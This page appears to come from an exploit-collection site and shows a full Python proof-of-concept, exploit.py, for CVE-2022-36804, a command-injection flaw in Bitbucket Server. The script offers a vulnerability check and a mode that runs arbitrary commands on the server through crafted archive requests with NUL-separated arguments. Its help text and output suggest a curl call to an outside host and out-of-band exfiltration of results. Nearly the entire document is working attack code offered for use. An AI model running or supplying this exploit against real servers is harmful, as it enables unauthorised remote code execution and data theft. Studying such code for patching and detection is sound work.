4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
import requests
import argparse
import json
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning

def check_if_vuln(session, url, repo, project):
    """Send a single probe request and print a verdict based on the response body.

    The probe hits the repository archive endpoint with a ``prefix`` value that
    contains an encoded NUL byte (``%00``), then looks for known marker strings
    in the returned text.

    Args:
        session: Object exposing a requests-style ``get(url, verify=...)``.
        url: Base URL of the server; it is concatenated directly with the API
            path, so it must already end with "/".
        repo: Repository name inserted into the request path.
        project: Project name inserted into the request path.

    Returns:
        None. The verdict is written to stdout.
    """
    target = "{}rest/api/latest/projects/{}/repos/{}/archive?format=zip&path=bighax&prefix=test/%00test".format(url, project, repo)
    print("[+] Attempting to trigger vulnerable response via {}".format(target))

    # Certificate verification is switched off for this request.
    body = session.get(target, verify=False).text

    # Ordered (marker, verdict) pairs: the first marker found in the body wins.
    verdicts = (
        (
            "An error occurred while executing an external process",
            "[+] Server does not appear to be vulnerable. :(",
        ),
        (
            "is not a valid ref and may not be archived",
            "[+] Server appears to be vulnerable.",
        ),
        (
            "You are not permitted to access this resource",
            "[!] You don't have access to this resource, if this is a private repo, you can provide your session token using --session.",
        ),
    )
    for marker, verdict in verdicts:
        if marker in body:
            print(verdict)
            return

    # None of the known markers matched.
    print("[+] Unknown response received from server, unable to verify if vulnerable or not.")

def run_cmd(session, url, repo, project, command):
    """Request the archive endpoint with ``command`` embedded in the ``prefix`` parameter.

    The command is percent-encoded and placed after ``--exec=`` inside a
    ``%00``-separated ``prefix`` value. The response body is then matched
    against known marker strings and a status line is printed for every
    outcome, including responses that match none of the markers.

    Args:
        session: Object exposing a requests-style ``get(url, verify=...)``.
        url: Base URL of the server; it is concatenated directly with the API
            path, so it must already end with "/".
        repo: Repository name inserted into the request path.
        project: Project name inserted into the request path.
        command: Command string; URL-encoded before being placed in the query.

    Returns:
        None. All results are reported on stdout.
    """
    # URL encode payload
    enc_command = urllib.parse.quote(command)
    # build the url
    poc_url = "{}rest/api/latest/projects/{}/repos/{}/archive?format=zip&path=bighax&prefix=test/%00--remote=/%00--exec={}%00--prefix=/".format(url, project, repo, enc_command)
    print("[+] Attempting to execute command on {}".format(url))

    # Certificate verification is switched off for this request.
    response = session.get(poc_url, verify=False)
    body = response.text

    # process results
    if "An error occurred while executing an external process" in body:
        print("[+] Server does not appear to be vulnerable. :(")
    elif "com.atlassian.bitbucket.scm.CommandFailedException" in body:
        print("[+] The command has been executed, please note that command results are (mostly) blind, it is recommended to enter a command that exfils the response OOB if possible.")
        # The marker can appear in a body that is not the expected
        # {"errors": [{"message": ...}]} JSON envelope; report that instead
        # of crashing with a traceback.
        try:
            message = response.json()["errors"][0]["message"]
        except (ValueError, LookupError, TypeError):
            print("[!] Unable to parse the error message from the API response.")
        else:
            print("[+] Response received from API: {}".format(message))
    elif "You are not permitted to access this resource" in body:
        print("[!] You don't have access to this resource, if this is a private repo, you can provide your session token using --session.")
    else:
        # Mirror check_if_vuln: never finish silently on an unrecognised reply.
        print("[+] Unknown response received from server, unable to verify if the command was executed.")


def main():
    """Parse command-line arguments, configure the HTTP session and run one action.

    ``--check`` takes precedence over ``--command`` when both are supplied.
    If neither is given, argparse reports the error on stderr together with
    the usage text and exits with status 2, before any session is built.
    """
    # arg parsing
    parser = argparse.ArgumentParser(description="Exploits the CVE-2022-36804 RCE in vulnerable BitBucket instances (< v8.3.1)")
    parser.add_argument("-p","--project", type=str, action="store", dest="project", help="The name of the project the public repository resides in (E.g. testproject)", required=True)
    parser.add_argument("-r","--repo", type=str, action="store", dest="repo", help="The name of the public repository (E.g. testrepo)", required=True)
    parser.add_argument("-u","--url", type=str, action="store", dest="url", help="The URL of the BitBucket server (E.g. http://localhost:7990/)", required=True)
    parser.add_argument("-c","--command", type=str, action="store", dest="command", help="The command to execute on the server (E.g. 'curl http://canary.domain/')")
    parser.add_argument("--proxy", type=str, action="store", dest="proxy", help="HTTP proxy to use for debugging (E.g. http://localhost:8080/)")
    parser.add_argument("--session", type=str, action="store", dest="session", help="The value of your 'BITBUCKETSESSIONID' cookie, required if your target repo is private. (E.g. 3DD8B1EBA3763AD2611F4940BD870865)")
    parser.add_argument("--check", action="store_true", dest="check", help="Only perform a check to see if the instance is vulnerable")
    args = parser.parse_args()

    # Fail fast, with a non-zero exit status, when no action was requested.
    if not args.check and not args.command:
        parser.error("Please specify either a command to execute on the server using -c or --command, or provide the --check flag to only check if the system is vulnerable.")

    # make sure url ends with a slash; the request helpers append the API path directly
    base_url = args.url if args.url.endswith("/") else args.url + "/"

    # build requests session
    s = requests.Session()
    s.headers.update({"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"})
    if args.session:
        s.cookies.update({"BITBUCKETSESSIONID":args.session})
    if args.proxy:
        print("[+] Configuring proxy to use {}".format(args.proxy))
        s.proxies.update({"http":args.proxy, "https":args.proxy})

    # disable warnings: the helpers send requests with verify=False, which
    # would otherwise emit an InsecureRequestWarning per request
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

    # do the things
    if args.check:
        check_if_vuln(s, base_url, args.repo, args.project)
    else:
        run_cmd(s, base_url, args.repo, args.project, args.command)


if __name__ == "__main__":
    main()